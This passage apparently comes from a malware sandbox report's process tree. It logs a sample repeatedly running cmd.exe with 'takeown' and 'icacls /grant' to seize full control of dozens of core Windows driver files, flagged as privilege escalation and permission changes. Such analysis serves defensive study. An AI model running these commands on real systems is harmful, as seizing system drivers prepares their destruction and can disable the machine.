C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"3⤵PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit2⤵PID:2348
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dfsc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit2⤵PID:1956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\discache.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit2⤵PID:2456
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\disk.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"3⤵PID:2540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit2⤵PID:2496
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Diskdump.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit2⤵PID:2764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dmvsc.sys3⤵PID:2464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit2⤵PID:2152
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmk.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit2⤵PID:2856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmkaud.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"3⤵PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit2⤵PID:648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpata.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit2⤵PID:2208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpfve.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit2⤵PID:1736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit2⤵PID:1628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxg.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"3⤵PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit2⤵PID:272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgkrnl.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit2⤵PID:1740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms1.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit2⤵PID:1764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\elxstor.sys3⤵PID:2276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit2⤵PID:3048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\errdev.sys3⤵PID:2840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit2⤵PID:2272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbda.sys3⤵PID:1120
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"3⤵PID:1800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit2⤵PID:3032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\exfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit2⤵PID:328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fastfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit2⤵PID:2612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fdc.sys3⤵PID:2368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"3⤵PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit2⤵PID:1280
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fileinfo.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit2⤵PID:2364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filetrace.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit2⤵PID:1896
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\flpydisk.sys3⤵PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit2⤵PID:3044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fltMgr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit2⤵PID:2256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fsdepends.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit2⤵PID:1948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fs_rec.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit2⤵PID:2832
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fvevol.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit2⤵PID:2788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS3⤵
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit2⤵PID:2324
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\GAGP30KX.SYS3⤵PID:2360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit2⤵PID:1336
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gm.dls3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit2⤵PID:1380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gmreadme.txt3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit2⤵PID:544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hcw85cir.sys3⤵PID:2444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"3⤵PID:2112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit2⤵PID:1500
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hdaudbus.sys3⤵PID:2276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"3⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit2⤵PID:2188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HdAudio.sys3⤵PID:924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit2⤵PID:2996
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbatt.sys3⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"3⤵PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit2⤵PID:448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbth.sys3⤵PID:1364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit2⤵PID:1448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidclass.sys3⤵PID:648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit2⤵PID:2672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidir.sys3⤵PID:1960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit2⤵PID:788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidparse.sys3⤵PID:2700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit2⤵PID:820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidusb.sys3⤵PID:976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit2⤵PID:1520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HpSAMD.sys3⤵
- Modifies file permissions
PID:2172
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit2⤵PID:2508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\http.sys3⤵PID:2012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit2⤵PID:1544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hwpolicy.sys3⤵PID:2192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit2⤵PID:2864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\i8042prt.sys3⤵PID:2436
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit2⤵PID:2344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorV.sys3⤵PID:904
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\idl9ocjosn4peq.sys && icacls C:\Windows\System32\drivers\idl9ocjosn4peq.sys /grant "%username%:F" && exit2⤵PID:1656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\idl9ocjosn4peq.sys3⤵
- Possible privilege escalation attempt
PID:2008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\idl9ocjosn4peq.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit2⤵PID:2608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iirsp.sys3⤵PID:1676
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit2⤵PID:2768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelide.sys3⤵PID:2856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit2⤵PID:1752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelppm.sys3⤵PID:2364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"3⤵PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit2⤵PID:1692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipfltdrv.sys3⤵PID:2544
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit2⤵PID:2184
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IPMIDrv.sys3⤵PID:1524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"3⤵PID:4352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit2⤵PID:1144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipnat.sys3⤵PID:1472
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit2⤵PID:2668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irda.sys3⤵PID:2500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irda.sys /grant "Admin:F"3⤵PID:4940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:2480
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵PID:2736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"3⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:1912
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:2044
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:2620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:2456
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:4824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:1696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵
- Possible privilege escalation attempt
PID:1636
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:2820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵
- Modifies file permissions
PID:1728
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:752
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:312
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵PID:3748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:2888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵PID:2496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:1012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵PID:3180
-
-
